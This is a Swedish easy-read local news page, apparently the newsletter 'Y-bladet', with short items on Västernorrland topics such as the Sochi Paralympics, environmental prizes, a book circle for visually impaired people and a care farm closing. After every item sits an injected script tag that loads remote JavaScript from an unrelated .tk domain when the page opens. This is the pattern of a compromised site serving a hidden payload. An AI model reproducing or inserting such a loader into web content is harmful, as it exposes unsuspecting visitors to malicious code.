Senaste nytt från Y-bladet

Nu börjar Paralympics i Sotji

Marcus Holm från Härnösand
gör sitt sjätte Paralympics
i kälkhockeylandslaget.
Han är assisterande lagkapten.
Han har 2 brons sedan tidigare.

Kristina Ulander som tävlar för
Sollefteå är uttagen till
Paralympics i rullstolscurling.
Där är Sverige favoriter till
att ta guld.
Paralympics i Sotji pågår
från 7 till 16 mars.
(Källa: Sundsvalls Tidning)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Landstingets miljöpris

Landstinget vill belöna insatser
som är bra för vår livsmiljö
i Västernorrland.
Därför vill de uppmuntra till
bra miljöarbete.
Det är 2 priser som delas ut
varje år.

Det interna miljöpriset 2013
på 15 tusen kronor gick till
Rehabklinikens sjukgymnastik
i Sundsvall och Härnösand.
De har bland annat engagerat
sig i hantering av avfall
och i besparing av energi.

Det externa miljöpriset på
25 tusen kronor gick till HEMAB,
Härnösand Energi och Miljö AB.
De arbetar för att öka produktionen
av fjärrvärme för att minska
belastningen på miljön.
Till fjärrvärmen använder man
rester från skogsindustrin.
Det är bark, skogsflis
och sågspån.
(Källa: lvn.se; hemab.se)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Skrapade fram storvinst

Emma Åkerstedt från Sundsvall
skrapade fram 250 tusen kronor
på sin trisslott i TV.
Hon är 22 år och läser till
sjuksköterska.

En stor del av pengarna
kommer att gå till resor.
Hon kanske åker tillbaka
till Ghana där hon arbetat
som volontär.
(Källa: Sundsvalls Tidning)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Bokcirkel för synskadade

På Kom In i Örnsköldsvik
träffas synskadade en gång
i månaden.
De har då en bokcirkel.
De läser en talbok innan
varje träff.

På träffarna pratar de om allt
från litteratur till hur det är att
ha en synskada.
- Det är så roligt att komma hit,
säger Ingrid Bonnedahl.

Böckerna har ofta lokal
anknytning berättar
Birgitta Hörnfeldt Holm,
synkonsulent på
Örnsköldsviks kommun.
(Källa: Örnsköldsviks Allehanda)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Gårdsbutik på Strömsborg i Sollefteå

En gårdsbutik med varor
producerade lokalt har
öppnat i Sollefteå.
Det kommer att finnas grönsaker
från Kvarnå och Hildas trädgård.
Kött och andra charkprodukter
kommer att finnas från köttgårdar
i Ramsele och Edsele.

I april kan man köpa tunnbröd
och färsk röding från Gäddede.
I gårdsbutiken går det också att
få tag på viltkött.
(Källa: Tidningen Ångermanland)
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Länsbornas hälsa

Landstinget skickar ut en enkät
till cirka 9 tusen personer i länet.
De som får enkäten är mellan
16 och 84 år.
Enkäten heter Hälsa på lika villkor.

Frågorna handlar om allt från
arbete och ekonomi till
kost och hälsa.
Svaren blir ett viktigt underlag
för arbetet med att förbättra
hälsan i länet.

Den här undersökningen
kommer att ske i alla län.
De blå kuverten med enkäterna
kommer ut under februari.
(Källa: Dagbladet)
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Stänger ner Kvickroten

Handikappomsorgens lantgård utanför
Sollefteå stänger efter 18 år.
Brukarna och personalen
måste flytta.

På Kvickroten har brukarna
fått göra det de klarar av.
Miljön med alla djuren
och tryggheten på Kvickroten
har varit bra för brukarnas
personliga utveckling.

- Vissa fungerar till exempel inte
på vanliga arbetsplatser
eller i miljöer med många ansikten.
Vi får göra det bästa av saken
och följas åt genom den här processen,
säger personalen.
(Källa: Tidningen Ångermanland)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Sollefteå får ny politisk organisation 2015

Ett mål för den nya organisationen
är att den ska underlätta för
medborgarna och näringslivet
att komma i kontakt med kommunen.
Det blir en ny funktion
som heter medborgarservice.

Ett annat mål är
att stärka demokratin.
Ledamöterna i fullmäktige
ska lättare kunna vara med
i hela processen.
De ska kunna både påbörja,
bereda och fatta beslut i viktiga frågor.

5 nämnder blir till en enda myndighet.
Det ska bli tydligare var det
politiska ansvaret ligger.
(Källa: solleftea.se)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Örnsköldsviks kommuns lättlästa webbplats

På Örnsköldsviks kommuns webbplats
finns information på lättläst svenska.
Den har blivit godkänd av
Centrum för lättläst.

Webbplatsen har blivit godkänd
efter ett antal kriterier.
Den är godkänd efter bland annat
tillgänglighet, språk,
struktur och form.

Den lättlästa webbplatsen ska
underlätta för personer som har
svårt att läsa och tillägna sig
en standardtext.
Det finns nu 7 kommuner som
är certifierade och godkända
av Centrum för lättläst i Sverige.
(Källa: Nolaskogs)

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Kräver fler speciallärare

Elever får inte det stöd
som de behöver,
trots att lärarna påpekar behovet.
Det är rektorerna som beslutar
hur många speciallärare som
ska finnas på en skola.
Ekonomin går före elevernas
behov.

Lärarförbundet kräver att
elevernas rätt ska stärkas
i skollagen.
De kräver att dubbelt så
många speciallärare utbildas.
Lärarförbundet kräver också
att de ska få högre löner.

Kunskapsresultaten sjunker
i skolan.
- Läget är akut,
säger Lärarförbundets ordförande
Christina Grewell.
(Källa: Örnsköldsviks Allehanda)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Sidor